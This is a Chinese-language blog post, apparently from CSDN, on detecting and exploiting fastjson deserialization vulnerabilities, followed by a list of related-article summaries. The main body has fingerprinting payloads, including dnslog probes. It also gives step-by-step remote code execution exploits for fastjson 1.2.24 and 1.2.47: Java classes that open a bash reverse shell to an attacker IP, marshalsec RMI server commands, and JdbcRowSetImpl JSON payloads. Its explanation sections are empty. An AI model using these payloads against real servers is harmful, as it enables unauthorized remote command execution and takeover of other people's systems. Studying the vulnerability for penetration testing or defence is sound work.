fastjson漏洞合集以及是否使用组件判断

最新推荐文章于 2024-08-31 06:45:00 发布
最新推荐文章于 2024-08-31 06:45:00 发布
阅读量860 收藏 3
点赞数 3
文章标签: web安全 安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46626737/article/details/132225101
版权

判断是否使用了fastjson组件:
        (1)通过报错
            { 
                "name":"asd";
            通过不把}闭合,来导致报错
        (2)查看其fastjson的版本
            [
                {
                    "a":"a\x] {"@type":"java.lang.AutoCloseable"a
        (3)通过dnslog来判断是否使用了fastjson
            1.2.67版本前
            {"zeo":{"@type":"java.net.Inet4Address","val":"745shj.dnslog.cn"}}
            1.2.67版本后
            {"@type":"java.net.Inet4Address","val":"dnslog"}
            {"@type":"java.net.Inet6Address","val":"dnslog"}
    1.fastjson 1.2.24 反序列化导致任意命令执行漏洞
        (1)漏洞版本:1.2.24之前
        (2)漏洞原理:
        (3)利用方法:
            1>编写一个exp.java文件
                import java.lang.Runtime;
                import java.lang.Process;

                public class exp {
                    static {
                        try{
                            Runtime.getRuntime().exec("/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/192.168.10.7/2233 0>&1");
                        }catch(Exception e){
                            e.printStackTrace();
                        }
                    }
                }
                javac编译
            2>将class文件放到http服务目录下
            3>使用marshalsec-0.0.3-SNAPSHOT-all.jar开启一个rmi或者ladp服务
                java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.10.7/#exp" 8000
            4>开启监听2233端口
            5>在数据包中加入json的poc
                {
                    "naraku":{
                        "@type":"com.sun.rowset.JdbcRowSetImpl",
                        "dataSourceName":"rmi://192.168.10.7/exp",
                        "autoCommit":true
                    }
                }
            6>则会发现rmi服务会有回显,而且shell会反弹回来
    2.Fastjson 1.2.47 远程命令执行漏洞
        (1)漏洞版本:1.2.48以前
        (2)漏洞原理:
        (3)利用方式:
            1)写一个java文件
                import java.lang.Runtime;
                import java.lang.Process;

                public class poc {
                    static {
                        try {
                            Runtime rt = Runtime.getRuntime();
                            String commands = "/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/192.168.10.7/2233 0>&1";
                            Process pc = rt.exec(commands);
                            pc.waitFor();
                        } catch (Exception e) {
                            // do nothing
                        }
                    }
                }
                编译成class,放到http目录下
            2)开启监听2233端口
            3)开启一个rmi服务
                java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.10.7/#poc" 8000
            4)加入json格式的poc发送数据包
                {
                    "a":{
                        "@type":"java.lang.Class",
                        "val":"com.sun.rowset.JdbcRowSetImpl"
                    },
                    "b":{
                        "@type":"com.sun.rowset.JdbcRowSetImpl",
                        "dataSourceName":"rmi://192.168.10.7:8001/poc",
                        "autoCommit":true
                    }
                }
                则会发现rmi服务会有回显,而且shell会反弹回来

!QK
关注
黑盒判断FastJson组件
课嗨教育的专栏
01-26 1393
判断方法个人总结有以下四种: 1. 响应报错 如果站点响应结果中会将代码控制台的错误结果回显,就可以用不闭合括号、引号等方式进行报错回显,报错结果中可以通过 类的包名判断是哪个json组件 com.alibaba.fastjson.JSONException com.fasterxml.jackson.databind.xxxxxxxxx 2. 支持额外属性的特性 fastjson支持类对象以外的属性获取,而jackson不支持,可以在测试时可以通过添加额外的参数值,查看是不否报
fastjson 判断是否包含_fastjson漏洞学习分析
weixin_34551573的博客
01-11 1208
0x00前言前面写了fastjson的利用,现在补上fastjson的分析,后面附上探测后端是否使用fastjon的方法(1.2.67)。0x01fastjson基本使用toJSONString()parseObject()这两个函数一个将对象转化为json字符串,一个将json字符串反序列化成对象。image.png一般来说使用第一种方法输出json字符串,这里将第二种方法写出来,是想体现fas...
通过dnslog探测fastjson的几种方法
Adminxe的博客
05-04 8017
0x01 背景 在渗透测试中遇到json数据一般都会测试下有没有反序列化。然而json库有fastjson,jackson,gson等等。怎么判断后端不是fastjson呢?这就需要构造特定的payload了。 昨天翻看fastjson源码时发现了一些可以构造dns解析且没在黑名单当中的类,于是顺手给官方提了下Issue。有趣的是后续的师傅们讨论还挺热闹的,我也在这次讨论中学习了很多。这篇...
Fastjson反序列化漏洞:深入探讨与安全防范
xycxycooo的博客
08-31 1288
通过本文的讲解,我们详细了解了Fastjson反序列化漏洞的原理、影响以及如何进行安全防范。Fastjson反序列化漏洞主要是由于Fastjson在反序列化过程中,对输入数据的安全验证不足,导致攻击者可以构造恶意JSON数据,触发反序列化操作,进而执行任意代码或命令。为了避免这类漏洞,可以采取升级Fastjson版本、禁用@type自动类型解析、使用白名单机制和输入验证安全防范措施。希望本文能够帮助你更好地理解和应用Fastjson反序列化漏洞安全防范。如果你有任何问题或需要进一步的解释,请随时提问。
fastjson 判断是否包含_通过dnslog探测fastjson的几种方法
weixin_39816362的博客
12-18 1401
0x01 背景在渗透测试中遇到json数据一般都会测试下有没有反序列化。然而json库有fastjson,jackson,gson等等。怎么判断后端不是fastjson呢?这就需要构造特定的payload了。昨天翻看fastjson源码时发现了一些可以构造dns解析且没在黑名单当中的类,于是顺手给官方提了下Issue。有趣的是后续的师傅们讨论还挺热闹的,我也在这次讨论中学习了很多。这篇文章算是对那...
fastjson 判断是否包含_fastjson 正则拒绝服务简单分析
weixin_39612058的博客
12-18 215
无意翻到b1ue大佬挖 fastjson 的拒绝服务漏洞的文章,于是跟了一下漏洞原理和触发流程,按照自己的理解简单地从结果出发开始分析。以下复现均是在1.2.62,漏洞影响范围 1.2.36~1.2.62漏洞缘由首先要说明的这是一个正则DOS引起的拒绝服务,最根本的原理如下String p = "^[a-zA-Z]+(([a-zA-Z ])?[a-zA-Z]*)*$";String strProp...
阿里巴巴fastjson漏洞攻击
u013637451的博客
09-10 1869
一 前言 Fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean 二 漏洞介绍 Fastjson 1.2.60版本以下存在字符串解析异常 该漏洞会导致java进程的占用内存迅速涨到JVM允许的最大值(-Xmx参数,默认为1/4物理内存大小),并且CPU飙升。 该漏洞并...
[Java安全]—fastjson漏洞利用
snowlyzz的博客
12-30 2347
Fastjson组件反序列化分析,从基础到RCE的过程笔记
从源码看Log4j2、FastJson漏洞
wdj_yyds的博客
12-31 4590
前言 远程代码漏洞对广大程序员来并不陌生,远程代码执行是指攻击者可能会通过远程调用的方式来攻击或控制计算机设备,无论该设备在哪里。如果远程代码执行的是一个死循环那服务器的CPU不得美滋滋了。 前段时间,Java 界的知名日志框架 Log4j2 发现了远程代码执行漏洞漏洞风暴席卷各大公司,编程届异常火热(加班),我们是万万没想到那么牛逼的日志框架有BUG。 这次安全漏洞也有个小插曲,我司的员工发现了漏洞,上报了Apache没告知GXB,我司也受到了处罚,希望下次引以为戒,不过这事程序员不背锅,管理下次
Tcsec安全研究院|fastjson漏洞分析
tcsecXD的博客
02-14 1994
fastjson 是一个 Java 库,可用于将 Java 对象转换为其 JSON 表示形式。
fastjson反序列化漏洞测试方法
qq_43143133的博客
07-20 819
快速判断fastjson与jackson
探索快速且精准的Fastjson漏洞检测工具:FastjsonScan
gitblog_00045的博客
05-16 1063
探索快速且精准的Fastjson漏洞检测工具:FastjsonScan 项目地址:https://gitcode.com/gh_mirrors/fa/FastjsonScan 在今天这个高度数字化的时代,数据的安全性至关重要。作为Java世界中广泛使用的JSON解析库,Fastjson因其高效性能深受开发者喜爱。然而,随之而来的是频繁出现的安全隐患。为此,我们向您推荐一款强大且持续更新的漏洞探测工...
2023最新最全 fastjson 漏洞批量检测工具使用教程。
logic1001的博客
11-29 3013
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
代码审计-Fastjson各版本漏洞分析(上)
cdyunaq的博客
04-15 3406
- 前言 - 最先出现问题的Fastjson 1.2.24反序列化漏洞已经分析过了,产生漏洞的原理也差不多理解了 •在1.2.25之后的版本,以及所有的.sec01后缀版本中,autotype功能默认是受限的(黑白名单机制) •在1.2.68之后的版本,fastjson增加了safeMode的支持。配置safeMode后,无论白名单和黑名单,都不支持autoType - 概念 - 可能出现一些新的概念,给一些参考链接吧 •FastJSON为什么要有autoType功能 •enable_auto
java:利用fastjson判断一个类型(java.lang.reflect.Type)是否是一个javabean
10km的专栏
09-10 9039
fastjson中JSON.toJSON(Object javaObject)方法将一个java对象被序列化成json对象时,返回的对象类型有三种可能:JSONObject,JSONArray,原始类型(简单类型)。 最近在使用fastjson进行对java对象序列化和反序列化时,遇到一个问题: 需要判断一个类型(java.lang.reflect.Type)是否为一个java bean(这里所
fastjson jsonobject 转bean失败_什么是FastJson的AutoType反序列化漏洞
weixin_39774556的博客
11-24 472
小编推荐:一年修复好几回fastjson漏洞,几十个服务挨个升级,心累无比?Fastjson频发的漏洞孕育出了一批叫苦连天的“fastjson 升级工程师”,漏洞产生的罪魁祸首就是autoType特性,如果不了解其中原理,那么漏洞就是个潘多拉魔盒,作为励志脱离CRUD工程师的合格程序员,有必要系统的了解下漏洞产生的根本原因及解决方案!1.频繁出现的反序列化漏洞最近公司的小伙伴们收到了一波...
Fastjson反序列化漏洞复现(实战案例)
qq_50854662的博客
04-18 2061
Fastjson反序列化漏洞复现(实战案例)
Java代码审计】Fastjson1.2.24漏洞分析
网络安全从业者的学习笔记
04-03 474
Fastjson是由阿里巴巴研发的一个java库,用来实现Java对象转换JSON格式以及JSON字符串转换为对象。 在Fastjson
如何使用fastjson漏洞探测系统版本
最新发布
09-22
如果你想要检测Fastjson是否存在已知的安全漏洞,通常不是直接通过Fastjson本身来探测版本,而是需要依赖于安全扫描工具、在线漏洞数据库,或是定期检查官方更新。 以下是基本步骤: 1. **使用依赖管理工具**:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值